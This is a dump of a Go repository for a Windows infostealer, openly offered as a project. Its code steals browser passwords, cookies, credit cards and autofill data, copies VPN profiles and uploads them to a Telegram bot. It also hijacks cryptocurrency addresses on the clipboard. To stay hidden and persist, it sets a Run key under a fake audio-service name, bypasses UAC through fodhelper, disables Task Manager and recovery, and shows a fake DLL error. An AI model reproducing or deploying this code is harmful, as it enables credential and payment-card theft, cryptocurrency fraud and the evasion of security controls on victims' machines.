├── .github ├── assets │ ├── ftps.png │ ├── vpns.png │ ├── system.png │ ├── browsers.png │ ├── wallets.png │ ├── commonfiles.png │ └── system-screenshot.png ├── ISSUE_TEMPLATE │ ├── feature_request.md │ └── bug_report.md └── pull_request_template.md ├── internal ├── fr │ └── fr.go ├── hc │ └── hc.go ├── taskmanager │ └── tm.go ├── core │ ├── browsers │ │ ├── conn.go │ │ ├── autofill.go │ │ ├── decrypt.go │ │ ├── creditcard.go │ │ ├── structs.go │ │ ├── history.go │ │ ├── downloads.go │ │ ├── cookies.go │ │ ├── masterkey.go │ │ ├── logins.go │ │ ├── paths.go │ │ ├── crypto.go │ │ └── browsers.go │ ├── clipper │ │ └── clipper.go │ ├── vpn │ │ ├── paths.go │ │ └── vpn.go │ ├── commonfiles │ │ └── commonfiles.go │ ├── games │ │ └── games.go │ ├── ftps │ │ └── ftps.go │ ├── socials │ │ └── socials.go │ ├── cryptowallets │ │ └── cryptowallets.go │ └── system │ │ └── system.go ├── fakerr │ └── fakeerr.go ├── uac │ └── uac.go ├── antivirus │ └── antivirus.go ├── antidebug │ └── antidebug.go └── antivm │ └── antivm.go ├── SECURITY.md ├── pkg └── utils │ ├── startup │ └── startup.go │ ├── processkill │ └── processkill.go │ ├── common │ └── common.go │ ├── requests │ └── requests.go │ └── fileutil │ └── fileutil.go ├── LICENSE ├── go.mod ├── CONTRIBUTING.md ├── cmd └── main.go └── README.md /.github/assets/ftps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unf6/vryxen/HEAD/.github/assets/ftps.png -------------------------------------------------------------------------------- /.github/assets/vpns.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unf6/vryxen/HEAD/.github/assets/vpns.png -------------------------------------------------------------------------------- /.github/assets/system.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unf6/vryxen/HEAD/.github/assets/system.png -------------------------------------------------------------------------------- /.github/assets/browsers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unf6/vryxen/HEAD/.github/assets/browsers.png -------------------------------------------------------------------------------- /.github/assets/wallets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unf6/vryxen/HEAD/.github/assets/wallets.png -------------------------------------------------------------------------------- /.github/assets/commonfiles.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unf6/vryxen/HEAD/.github/assets/commonfiles.png -------------------------------------------------------------------------------- /.github/assets/system-screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/unf6/vryxen/HEAD/.github/assets/system-screenshot.png -------------------------------------------------------------------------------- /internal/fr/fr.go: -------------------------------------------------------------------------------- 1 | package FactoryReset 2 | 3 | import "os/exec" 4 | 5 | func Disable() { 6 | exec.Command("reagentc.exe", "/disable").Run() 7 | } -------------------------------------------------------------------------------- /internal/hc/hc.go: -------------------------------------------------------------------------------- 1 | package HideConsole 2 | 3 | import ( 4 | "syscall" 5 | ) 6 | 7 | func Hide() { 8 | getWin := syscall.NewLazyDLL("kernel32.dll").NewProc("GetConsoleWindow") 9 | showWin := syscall.NewLazyDLL("user32.dll").NewProc("ShowWindow") 10 | hwnd, _, _ := getWin.Call() 11 | _, _, _ = showWin.Call(hwnd, 0) 12 | } -------------------------------------------------------------------------------- /internal/taskmanager/tm.go: -------------------------------------------------------------------------------- 1 | package TaskManager 2 | 3 | import "golang.org/x/sys/windows/registry" 4 | 5 | func Disable() { 6 | key, _ := registry.OpenKey(registry.CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", registry.SET_VALUE|registry.CREATE_SUB_KEY) 7 | defer key.Close() 8 | 9 | _ = key.SetDWordValue("DisableTaskMgr", 1) 10 | } -------------------------------------------------------------------------------- /internal/core/browsers/conn.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | 7 | _ "modernc.org/sqlite" 8 | ) 9 | 10 | func GetDBConnection(database string) (*sql.DB, error) { 11 | connection, err := sql.Open("sqlite", fmt.Sprintf("file:%s?mode=ro&immutable=1", database)) 12 | if err != nil { 13 | return nil, err 14 | } 15 | 16 | return connection, nil 17 | } -------------------------------------------------------------------------------- /internal/fakerr/fakeerr.go: -------------------------------------------------------------------------------- 1 | package FakeError 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | func Show() { 9 | var title, text *uint16 10 | title, _ = syscall.UTF16PtrFromString("Missing Dependencies - Fatal Error") 11 | text, _ = syscall.UTF16PtrFromString("The code execution cannot proceed because VCRUNTIME140_1.dll was not found. Reinstalling the program may fix this problem.") 12 | syscall.NewLazyDLL("user32.dll").NewProc("MessageBoxW").Call(0, uintptr(unsafe.Pointer(text)), uintptr(unsafe.Pointer(title)), 0) 13 | } -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature Request 3 | about: Suggest an idea for this project. 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Security Policy 2 | 3 | ## Supported Versions 4 | 5 | Use this section to tell people about which versions of your project are 6 | currently being supported with security updates. 7 | 8 | | Version | Supported | 9 | | ------- | ------------------ | 10 | | 5.1.x | :white_check_mark: | 11 | | 5.0.x | :x: | 12 | | 4.0.x | :white_check_mark: | 13 | | < 4.0 | :x: | 14 | 15 | ## Reporting a Vulnerability 16 | 17 | Use this section to tell people how to report a vulnerability. 18 | 19 | Tell them where to go, how often they can expect to get an update on a 20 | reported vulnerability, what to expect if the vulnerability is accepted or 21 | declined, etc. 22 | -------------------------------------------------------------------------------- /.github/pull_request_template.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | Please include a summary of the changes and the related issue. Please also include relevant motivation and context. List any dependencies that are required for this change. 4 | 5 | ## Type of change 6 | 7 | Please delete options that are not relevant. 8 | 9 | - [ ] Bug fix (non-breaking change which fixes an issue) 10 | - [ ] New feature (non-breaking change which adds functionality) 11 | 12 | # How Has This Been Tested? 13 | 14 | Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration 15 | 16 | - [ ] Test A 17 | - [ ] Test B 18 | 19 | **Test Configuration**: 20 | * Hardware: 21 | * Go Version: 22 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop** 27 | - Go version 28 | - Windows version 29 | - Module name 30 | - Version of the app you are using the module on (if applicable) 31 | 32 | **Additional context** 33 | Add any other context about the problem here. 34 | -------------------------------------------------------------------------------- /internal/core/browsers/autofill.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "path/filepath" 5 | 6 | _ "modernc.org/sqlite" 7 | ) 8 | 9 | func (c *Chromium) GetAutofills(path string) (autofills []Autofill, err error) { 10 | db, err := GetDBConnection(filepath.Join(path, "Default", "Web Data")) 11 | if err != nil { 12 | return nil, err 13 | } 14 | 15 | rows, err := db.Query("SELECT name, value FROM autofill") 16 | 17 | if err != nil { 18 | return nil, err 19 | } 20 | 21 | defer rows.Close() 22 | 23 | for rows.Next() { 24 | var name, value string 25 | 26 | if err := rows.Scan(&name, value); err != nil { 27 | continue 28 | } 29 | if name == "" || value == "" { 30 | continue 31 | } 32 | 33 | autofills = append(autofills, Autofill{ 34 | Name: name, 35 | Value: value, 36 | }) 37 | 38 | } 39 | 40 | return autofills, nil 41 | } 42 | -------------------------------------------------------------------------------- /pkg/utils/startup/startup.go: -------------------------------------------------------------------------------- 1 | package startup 2 | 3 | import ( 4 | "golang.org/x/sys/windows/registry" 5 | "os" 6 | "os/exec" 7 | 8 | "github.com/unf6/vryxen/pkg/utils/fileutil" 9 | ) 10 | 11 | func Run() error { 12 | exe, err := os.Executable() 13 | if err != nil { 14 | return err 15 | } 16 | 17 | key, err := registry.OpenKey(registry.CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", registry.ALL_ACCESS) 18 | if err != nil { 19 | return err 20 | } 21 | 22 | defer key.Close() 23 | 24 | path := os.Getenv("APPDATA") + "\\Microsoft\\Protect\\SecurityHealthSystray.exe" 25 | 26 | err = key.SetStringValue("Realtek HD Audio Universal Service", path) 27 | if err != nil { 28 | return err 29 | } 30 | 31 | if fileutil.Exists(path) { 32 | err = os.Remove(path) 33 | if err != nil { 34 | return err 35 | } 36 | } 37 | 38 | err = fileutil.CopyFile(exe, path) 39 | if err != nil { 40 | return err 41 | } 42 | 43 | return exec.Command("attrib", "+h", "+s", path).Run() 44 | } -------------------------------------------------------------------------------- /internal/core/browsers/decrypt.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "errors" 7 | ) 8 | 9 | func (c *Chromium) Decrypt(encryptPass []byte) ([]byte, error) { 10 | if len(c.MasterKey) == 0 { 11 | return DPAPI(encryptPass) 12 | } 13 | 14 | if len(encryptPass) < 15 { 15 | return nil, errors.New("empty password") 16 | } 17 | 18 | crypted := encryptPass[15:] 19 | nounce := encryptPass[3:15] 20 | 21 | block, err := aes.NewCipher(c.MasterKey) 22 | if err != nil { 23 | return nil, err 24 | } 25 | blockMode, err := cipher.NewGCM(block) 26 | if err != nil { 27 | return nil, err 28 | } 29 | origData, err := blockMode.Open(nil, nounce, crypted, nil) 30 | if err != nil { 31 | return nil, err 32 | } 33 | return origData, nil 34 | } 35 | 36 | func (g *Gecko) Decrypt(encryptPass []byte) ([]byte, error) { 37 | PBE, err := NewASN1PBE(encryptPass) 38 | if err != nil { 39 | return nil, err 40 | } 41 | var key []byte 42 | return PBE.Decrypt(g.MasterKey, key) 43 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Xretic 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /internal/core/clipper/clipper.go: -------------------------------------------------------------------------------- 1 | package clipper 2 | 3 | import ( 4 | "context" 5 | "golang.design/x/clipboard" 6 | "regexp" 7 | ) 8 | 9 | func Run(cryptos map[string]string) { 10 | var regexs = map[string]*regexp.Regexp{ 11 | "BTC": regexp.MustCompile("^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$"), 12 | "BCH": regexp.MustCompile("^((bitcoincash:)?(q|p)[a-z0-9]{41})"), 13 | "ETH": regexp.MustCompile("^0x[a-fA-F0-9]{40}$"), 14 | "XMR": regexp.MustCompile("^4([0-9]|[A-B])(.){93}$"), 15 | "LTC": regexp.MustCompile("^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$"), 16 | "XCH": regexp.MustCompile("^xch1[a-zA-HJ-NP-Z0-9]{58}$"), 17 | "XLM": regexp.MustCompile("^G[0-9a-zA-Z]{55}$"), 18 | "TRX": regexp.MustCompile("^T[A-Za-z1-9]{33}$"), 19 | "ADA": regexp.MustCompile("addr1[a-z0-9]+"), 20 | "DASH": regexp.MustCompile("^X[1-9A-HJ-NP-Za-km-z]{33}$"), 21 | "DOGE": regexp.MustCompile("^(D|A|9)[a-km-zA-HJ-NP-Z1-9]{33}$"), 22 | } 23 | 24 | 25 | for data := range clipboard.Watch(context.TODO(), clipboard.FmtText) { 26 | for crypto, regex := range regexs { 27 | if regex.Match(data) && regex.MatchString(cryptos[crypto]) { 28 | clipboard.Write(clipboard.FmtText, []byte(cryptos[crypto])) 29 | } 30 | } 31 | } 32 | } -------------------------------------------------------------------------------- /internal/core/browsers/creditcard.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "path/filepath" 5 | 6 | _ "modernc.org/sqlite" 7 | ) 8 | 9 | func (c *Chromium) GetCreditCards(path string) (creditCards []CreditCard, err error) { 10 | db, err := GetDBConnection(filepath.Join(path, "Web Data")) 11 | if err != nil { 12 | return nil, err 13 | } 14 | 15 | rows, err := db.Query("SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id FROM credit_cards") 16 | if err != nil { 17 | return nil, err 18 | } 19 | 20 | defer rows.Close() 21 | 22 | for rows.Next() { 23 | 24 | var ( 25 | name, month, year, address string 26 | value, encryptValue []byte 27 | ) 28 | if err := rows.Scan(&name, &month, &year, &encryptValue, &address); err != nil { 29 | continue 30 | } 31 | if month == "" || year == "" || encryptValue == nil { 32 | continue 33 | } 34 | 35 | creditCard := CreditCard{ 36 | Name: name, 37 | ExpirationYear: year, 38 | ExpirationMonth: month, 39 | Address: address, 40 | } 41 | 42 | value, err = c.Decrypt(encryptValue) 43 | if err != nil { 44 | continue 45 | } 46 | 47 | creditCard.Number = string(value) 48 | creditCards = append(creditCards, creditCard) 49 | } 50 | 51 | return creditCards, nil 52 | } -------------------------------------------------------------------------------- /pkg/utils/processkill/processkill.go: -------------------------------------------------------------------------------- 1 | package processkill 2 | 3 | import ( 4 | "os/exec" 5 | "strings" 6 | "time" 7 | ) 8 | 9 | func seqStop(processName string) { 10 | cmd := exec.Command("cmd", "/C", "taskkill", "/F", "/IM", processName+".exe") 11 | cmd.Run() 12 | } 13 | 14 | func procCheck(processName string) bool { 15 | cmd := exec.Command("cmd", "/C", "tasklist", "/FI", "IMAGENAME eq "+processName+".exe") 16 | output, err := cmd.Output() 17 | if err != nil { 18 | return false 19 | } 20 | return strings.Contains(string(output), processName+".exe") 21 | } 22 | 23 | func recheck(processName string) { 24 | seqStop(processName) 25 | time.Sleep(1 * time.Second) 26 | if procCheck(processName) { 27 | seqStop(processName) 28 | } 29 | } 30 | 31 | func Run() { 32 | browserProcesses := []string{ 33 | "360chrome", "360se", "avant", "brave", "chrome", "chromium", "citrio", 34 | "comodo_dragon", "coolnovo", "coowon", "cyberfox", "deepnet", "dooble", 35 | "epic", "firefox", "iceweasel", "iridium", "k-meleon", "maxthon", 36 | "msedge", "netscape", "opera", "palemoon", "safari", "seamonkey", 37 | "sleipnir", "sputnik", "torch", "ucbrowser", "vivaldi", "waterfox", 38 | "yandex", "yandexbrowser", "operagx", 39 | } 40 | 41 | for _, processName := range browserProcesses { 42 | if procCheck(processName) { 43 | recheck(processName) 44 | } 45 | } 46 | } -------------------------------------------------------------------------------- /internal/core/browsers/structs.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | type Chromium struct { 4 | MasterKey []byte 5 | } 6 | 7 | type Gecko struct { 8 | MasterKey []byte 9 | } 10 | 11 | type Browser struct { 12 | Name string 13 | Path string 14 | User string 15 | } 16 | 17 | type Profile struct { 18 | Name string 19 | Path string 20 | Browser Browser 21 | 22 | Logins []Login 23 | Cookies []Cookie 24 | CreditCards []CreditCard 25 | Downloads []Download 26 | History []History 27 | Autofill []Autofill 28 | Bookmark []Bookmark 29 | } 30 | 31 | type Login struct { 32 | Username string 33 | Password string 34 | LoginURL string 35 | } 36 | 37 | type Cookie struct { 38 | Host string 39 | Name string 40 | Path string 41 | Value string 42 | ExpireDate int64 43 | } 44 | 45 | type CreditCard struct { 46 | GUID string 47 | Name string 48 | ExpirationYear string 49 | ExpirationMonth string 50 | Number string 51 | Address string 52 | Nickname string 53 | } 54 | 55 | type Download struct { 56 | TargetPath string 57 | URL string 58 | } 59 | 60 | type History struct { 61 | Title string 62 | URL string 63 | VisitCount int 64 | LastVisitTime int64 65 | } 66 | 67 | type Autofill struct { 68 | Name string 69 | Value string 70 | } 71 | 72 | type Bookmark struct { 73 | Name string 74 | Value string 75 | } 76 | -------------------------------------------------------------------------------- /internal/core/vpn/paths.go: -------------------------------------------------------------------------------- 1 | package vpn 2 | 3 | func VpnPaths() map[string]string { 4 | return map[string]string{ 5 | 6 | "OpenVPN Connect": "AppData\\Roaming\\OpenVPN Connect\\profiles", 7 | "Mullvad VPN": "AppData\\Roaming\\Mullvad VPN", 8 | "Proton VPN": "AppData\\Local\\ProtonVPN", 9 | "Nord VPN": "AppData\\Local\\NordVPN", 10 | "Express VPN": "AppData\\Local\\ExpressVPN", 11 | "CyberGhost": "AppData\\Local\\CyberGhost", 12 | "Surfshark": "AppData\\Local\\Surfshark", 13 | "Vypr VPN": "AppData\\Local\\VyprVPN", 14 | "Windscribe": "AppData\\Local\\Windscribe", 15 | "Hide.me": "AppData\\Local\\hide.me VPN", 16 | "Hotspot Shield": "AppData\\Local\\Hotspot Shield", 17 | "TunnelBear": "AppData\\Local\\TunnelBear", 18 | "IPVanish": "AppData\\Local\\IPVanish", 19 | "HMA (HideMyAss)": "AppData\\Local\\HMA VPN", 20 | "ZenMate": "AppData\\Local\\ZenMate", 21 | "Pure VPN": "AppData\\Local\\PureVPN", 22 | "TorGuard": "AppData\\Local\\TorGuard", 23 | "Betternet": "AppData\\Local\\Betternet", 24 | "PrivateVPN": "AppData\\Local\\PrivateVPN", 25 | "VPN Unlimited": "AppData\\Local\\VPN Unlimited", 26 | "Goose VPN": "AppData\\Local\\GooseVPN", 27 | "SaferVPN": "AppData\\Local\\SaferVPN", 28 | "Private Internet Access (PIA)": "AppData\\Local\\Private Internet Access", 29 | } 30 | } -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/unf6/vryxen 2 | 3 | go 1.24.2 4 | 5 | require ( 6 | github.com/alexmullins/zip v0.0.0-20180717182244-4affb64b04d0 7 | github.com/shirou/gopsutil/v3 v3.24.5 8 | golang.design/x/clipboard v0.7.0 9 | golang.org/x/crypto v0.45.0 10 | golang.org/x/sys v0.38.0 11 | modernc.org/sqlite v1.37.0 12 | ) 13 | 14 | require golang.org/x/exp/shiny v0.0.0-20250408133849-7e4ce0ab07d0 // indirect 15 | 16 | require ( 17 | github.com/KasimKaizer/gofileioupload v0.1.2 18 | github.com/dustin/go-humanize v1.0.1 // indirect 19 | github.com/go-ole/go-ole v1.2.6 // indirect 20 | github.com/google/uuid v1.6.0 // indirect 21 | github.com/lufia/plan9stats v0.0.0-20211012122336-39d0f177ccd0 // indirect 22 | github.com/mattn/go-isatty v0.0.20 // indirect 23 | github.com/ncruces/go-strftime v0.1.9 // indirect 24 | github.com/power-devops/perfstat v0.0.0-20210106213030-5aafc221ea8c // indirect 25 | github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect 26 | github.com/shoenig/go-m1cpu v0.1.6 // indirect 27 | github.com/tklauser/go-sysconf v0.3.12 // indirect 28 | github.com/tklauser/numcpus v0.6.1 // indirect 29 | github.com/yusufpapurcu/wmi v1.2.4 // indirect 30 | golang.org/x/exp v0.0.0-20250305212735-054e65f0b394 // indirect 31 | golang.org/x/image v0.18.0 // indirect 32 | golang.org/x/mobile v0.0.0-20231127183840-76ac6878050a // indirect 33 | modernc.org/libc v1.62.1 // indirect 34 | modernc.org/mathutil v1.7.1 // indirect 35 | modernc.org/memory v1.9.1 // indirect 36 | ) 37 | -------------------------------------------------------------------------------- /internal/core/vpn/vpn.go: -------------------------------------------------------------------------------- 1 | package vpn 2 | 3 | import ( 4 | "github.com/unf6/vryxen/pkg/utils/common" 5 | "github.com/unf6/vryxen/pkg/utils/requests" 6 | "github.com/unf6/vryxen/pkg/utils/fileutil" 7 | "fmt" 8 | "os" 9 | "path/filepath" 10 | "strings" 11 | ) 12 | 13 | func Run(botToken, chatId string) { 14 | vpnsTempDir := filepath.Join(os.TempDir(), "vpns-temp") 15 | os.MkdirAll(vpnsTempDir, os.ModePerm) 16 | 17 | var vpnsFound strings.Builder 18 | 19 | for _, user := range common.GetUsers() { 20 | for name, relativePath := range VpnPaths() { 21 | vpnsPath := filepath.Join(user, relativePath) 22 | if !fileutil.Exists(vpnsPath) || !fileutil.IsDir(vpnsPath) { 23 | continue 24 | } 25 | 26 | vpnsDestPath := filepath.Join(vpnsTempDir, filepath.Base(user), name) 27 | if err := fileutil.CopyDir(vpnsPath, vpnsDestPath); err == nil { 28 | vpnsFound.WriteString(fmt.Sprintf("\n✅ %s - %s", filepath.Base(user), name)) 29 | } 30 | } 31 | } 32 | 33 | if vpnsFound.Len() == 0 { 34 | return 35 | } 36 | 37 | vpnsFoundStr := vpnsFound.String() 38 | if len(vpnsFoundStr) > 4090 { 39 | vpnsFoundStr = "Numerous vpns to explore." 40 | } 41 | 42 | vpnsTempZip := filepath.Join(os.TempDir(), "vpns.zip") 43 | password := common.RandString(16) 44 | if err := fileutil.ZipWithPassword(vpnsTempDir, vpnsTempZip, password); err != nil { 45 | fmt.Println("Error zipping directory:", err) 46 | return 47 | } 48 | 49 | message := "Password :" + password + "Founds: " + vpnsFoundStr 50 | requests.Send2TelegramDocument(botToken, chatId, vpnsTempZip) 51 | requests.Send2TelegramMessage(botToken, chatId, message) 52 | 53 | } -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing to [vryxen](https://github.com/unf6/vryxen) 2 | 3 | ## Feature Requests 4 | 5 | A feature request is a request for a new feature or an enhancement to an existing feature. 6 | 7 | Generally features are requested through the use of the [feature request template](https://github.com/unf6/vryxen/blob/main/.github/ISSUE_TEMPLATE/feature_request.md). 8 | 9 | Ensure you do not create a duplicate feature request by searching through the existing feature requests. 10 | 11 | Please give detailed information about the feature you are requesting in order for it to be best implemented. 12 | 13 | Note that feature requests are not guaranteed to be implemented. 14 | 15 | ## Bug Reports 16 | 17 | A bug report is a report of a bug or issue in the software. 18 | 19 | Generally bugs are reported through the use of the [bug report template](https://github.com/unf6/vryxen/blob/main/.github/ISSUE_TEMPLATE/bug_report.md) 20 | 21 | Ensure you do not create a duplicate bug report by searching through the existing bug reports. 22 | 23 | Please make sure to include as much information as possible in your bug report. This includes: 24 | 25 | - The expected behaviour 26 | - The actual behaviour 27 | - The steps to reproduce the bug 28 | - Any error messages 29 | - Go version 30 | - Windows version 31 | - Module name 32 | - Version of the app you are using the module on (if applicable) 33 | 34 | ## Pull Requests 35 | 36 | A pull request is a request to add your own code to the project therefore solving an issue or adding a feature. 37 | 38 | Generally pull requests are submitted through the use of the [pull request template](https://github.com/unf6/vryxen/blob/main/.github/pull_request_template.md). 39 | 40 | Please ensure your pull request adheres to the following guidelines: 41 | - It does not break existing functionality 42 | - It follows a similar style to the rest of the project 43 | -------------------------------------------------------------------------------- /internal/core/browsers/history.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "path/filepath" 5 | 6 | _ "modernc.org/sqlite" 7 | ) 8 | 9 | func (c *Chromium) GetHistory(path string) (history []History, err error) { 10 | db, err := GetDBConnection(filepath.Join(path, "History")) 11 | if err != nil { 12 | return nil, err 13 | } 14 | 15 | rows, err := db.Query("SELECT url, title, visit_count, last_visit_time FROM urls") 16 | if err != nil { 17 | return nil, err 18 | } 19 | defer rows.Close() 20 | 21 | for rows.Next() { 22 | var ( 23 | url, title string 24 | visitCount int 25 | lastVisitTime int64 26 | ) 27 | if err = rows.Scan(&url, &title, &visitCount, &lastVisitTime); err != nil { 28 | continue 29 | } 30 | 31 | if url == "" || title == "" { 32 | continue 33 | } 34 | 35 | history = append(history, History{ 36 | URL: url, 37 | Title: title, 38 | VisitCount: visitCount, 39 | LastVisitTime: lastVisitTime, 40 | }) 41 | 42 | } 43 | 44 | return history, nil 45 | } 46 | 47 | func (g *Gecko) GetHistory(path string) (history []History, err error) { 48 | db, err := GetDBConnection(filepath.Join(path, "places.sqlite")) 49 | if err != nil { 50 | return nil, err 51 | } 52 | 53 | rows, err := db.Query("SELECT url, title, visit_count, last_visit_date FROM moz_places") 54 | if err != nil { 55 | return nil, err 56 | } 57 | defer rows.Close() 58 | 59 | for rows.Next() { 60 | var ( 61 | url, title string 62 | visitCount int 63 | lastVisitTime int64 64 | ) 65 | if err = rows.Scan(&url, &title, &visitCount, &lastVisitTime); err != nil { 66 | continue 67 | } 68 | 69 | if url == "" || title == "" { 70 | continue 71 | } 72 | 73 | history = append(history, History{ 74 | URL: url, 75 | Title: title, 76 | VisitCount: visitCount, 77 | LastVisitTime: lastVisitTime, 78 | }) 79 | 80 | } 81 | 82 | return history, nil 83 | } -------------------------------------------------------------------------------- /internal/core/browsers/downloads.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "path/filepath" 5 | "regexp" 6 | 7 | _ "modernc.org/sqlite" 8 | ) 9 | 10 | func (c *Chromium) GetDownloads(path string) (downloads []Download, err error) { 11 | db, err := GetDBConnection(filepath.Join(path, "History")) 12 | if err != nil { 13 | return nil, err 14 | } 15 | 16 | rows, err := db.Query("SELECT tab_url, target_path FROM downloads") 17 | if err != nil { 18 | return nil, err 19 | } 20 | 21 | defer rows.Close() 22 | 23 | for rows.Next() { 24 | var ( 25 | url, path string 26 | ) 27 | if err = rows.Scan(&url, &path); err != nil { 28 | continue 29 | } 30 | 31 | if url == "" || path == "" { 32 | continue 33 | } 34 | 35 | downloads = append(downloads, Download{ 36 | URL: url, 37 | TargetPath: path, 38 | }) 39 | 40 | } 41 | 42 | return downloads, nil 43 | } 44 | 45 | func (g *Gecko) GetDownloads(path string) (downloads []Download, err error) { 46 | db, err := GetDBConnection(filepath.Join(path, "places.sqlite")) 47 | if err != nil { 48 | return nil, err 49 | } 50 | 51 | rows, err := db.Query("SELECT place_id, GROUP_CONCAT(content), url, dateAdded FROM (SELECT * FROM moz_annos INNER JOIN moz_places ON moz_annos.place_id=moz_places.id) t GROUP BY place_id") 52 | if err != nil { 53 | return nil, err 54 | } 55 | 56 | defer rows.Close() 57 | 58 | for rows.Next() { 59 | var ( 60 | content, url string 61 | placeID, dateAdded int64 62 | ) 63 | 64 | if err = rows.Scan(&placeID, &content, &url, &dateAdded); err != nil { 65 | continue 66 | } 67 | if url == "" || path == "" { 68 | continue 69 | } 70 | re := regexp.MustCompile(`file:///(.*?),`) 71 | result := re.FindStringSubmatch(content) 72 | if len(result) == 0 { 73 | continue 74 | } 75 | downloads = append(downloads, Download{ 76 | URL: url, 77 | TargetPath: result[1], 78 | }) 79 | } 80 | 81 | return downloads, nil 82 | } -------------------------------------------------------------------------------- /internal/uac/uac.go: -------------------------------------------------------------------------------- 1 | package Uac 2 | 3 | import ( 4 | "github.com/unf6/vryxen/pkg/utils/common" 5 | "os" 6 | "os/exec" 7 | "syscall" 8 | "unsafe" 9 | 10 | "golang.org/x/sys/windows/registry" 11 | ) 12 | 13 | 14 | func CanElevate() bool { 15 | var infoPointer uintptr 16 | 17 | syscall.NewLazyDLL("netapi32.dll").NewProc("NetUserGetInfo").Call( 18 | 0, 19 | uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(os.Getenv("USERNAME")))), 20 | 1, 21 | uintptr(unsafe.Pointer(&infoPointer)), 22 | ) 23 | 24 | defer syscall.NewLazyDLL("netapi32.dll").NewProc("NetApiBufferFree").Call(infoPointer) 25 | 26 | type user struct { 27 | Username *uint16 28 | Password *uint16 29 | PasswordAge uint32 30 | Priv uint32 31 | HomeDir *uint16 32 | Comment *uint16 33 | Flags uint32 34 | ScriptPath *uint16 35 | } 36 | 37 | info := (*user)(unsafe.Pointer(infoPointer)) 38 | 39 | return info.Priv == 2 40 | } 41 | 42 | func Elevate() error { 43 | k, _, err := registry.CreateKey(registry.CURRENT_USER, 44 | "Software\\Classes\\ms-settings\\shell\\open\\command", registry.ALL_ACCESS) 45 | if err != nil { 46 | return err 47 | } 48 | 49 | defer k.Close() 50 | 51 | value, err := os.Executable() 52 | if err != nil { 53 | return err 54 | } 55 | 56 | if err = k.SetStringValue("", value); err != nil { 57 | return err 58 | } 59 | if err = k.SetStringValue("DelegateExecute", ""); err != nil { 60 | return err 61 | } 62 | 63 | cmd := exec.Command("cmd.exe", "/C", "fodhelper") 64 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} 65 | err = cmd.Run() 66 | if err != nil { 67 | return err 68 | } 69 | 70 | err = k.DeleteValue("") 71 | if err != nil { 72 | return err 73 | } 74 | 